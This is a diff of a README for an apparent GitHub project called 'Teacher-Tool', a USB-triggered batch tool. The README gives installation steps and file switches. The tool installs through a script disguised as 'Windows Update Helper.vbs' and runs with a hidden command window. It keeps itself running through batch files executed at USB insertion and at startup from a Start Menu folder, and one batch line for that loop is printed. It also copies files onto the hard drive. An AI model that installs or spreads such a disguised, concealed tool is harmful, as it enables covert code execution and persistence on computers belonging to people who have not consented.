RealFoxerity/Teacher-Tool/README.md

 # How to install and use

-to install, you need "Windows Update Helper.vbs", lmao.bat and lmao69.dat on the *root* of the usb and launch lmao.bat
+to install, you need "Windows Update Helper.vbs", lmao.bat and lmao69.dat on the *root* of the usb and launch lmao.bat (with debug 4.0 only lmao.bat)

 Installation takes around 3 seconds, however most of this time, the cmd is invisible

-after install you only need lmao69.dat with "initcopy" inside
+after install you only need lmao69.dat with "initcopy" inside (without quotes)

 # File Options

-novbs.dat -> enables "Debug" mode meaning that you can see the cmd window
+novbs.dat -> enables "Debug" mode meaning that you can see the cmd window (OPTIONAL)

-dontcopy.dat -> disables copying
+dontcopy.dat -> disables copying (OPTIONAL)

-UNIN000.dat -> uninstalls the "tool"
+UNIN000.dat -> uninstalls the "tool" (OPTIONAL)

-atinsert.dat -> adds programs to be executed at usb insertion (only .bat)
+atinsert.dat -> adds programs to be executed at usb insertion (only .bat) (OPTIONAL)

-atstartup.dat -> adds programs to be executed at startup (only .bat)
+atstartup.dat -> adds programs to be executed at startup (only .bat) (OPTIONAL)

-transfer.dat -> copy files to hdd upon usb insert; D:\transfer\Desktop\idk.docx => C:\Windows\Users\USERNAME\Desktop\idk.docx

 code for handling these :
-`if exist "%appdata%\Microsoft\Windows\Start Menu\Programs\lmaostartup" (for /r "%appdata%\Microsoft\Windows\Start Menu\Programs\lmaostartup" %%a in () do (call "%%a"))`
+`if exist "%appdata%\Microsoft\Windows\Start Menu\Programs\lmaostartup" (for /r "%appdata%\Microsoft\Windows\Start Menu\Programs\lmaostartup" %%a in (*.bat) do (call "%%a"))`

+transfer.dat -> copy files to hdd upon usb insert; D:\transfer\Desktop\idk.docx => C:\Windows\Users\USERNAME\Desktop\idk.docx (OPTIONAL)

-lmao69.dat -> file responsible for detecting the usb. needs "initcopy" or .exe filename inside (gets executed) to work (ESSENTIAL)
+lmao69.dat -> file responsible for detecting the usb. needs "initcopy" or .bat filename inside (gets executed) to work (ESSENTIAL)

-force_dat.dat -> if the program doesn't check the file for some reason (i.e. the check for file of initcopy is disabled), this forces the check
+force_dat.dat -> if the program doesn't check the file for some reason (i.e. the check for file of initcopy is disabled), this forces the check (OPTIONAL)

 # 2 additional modules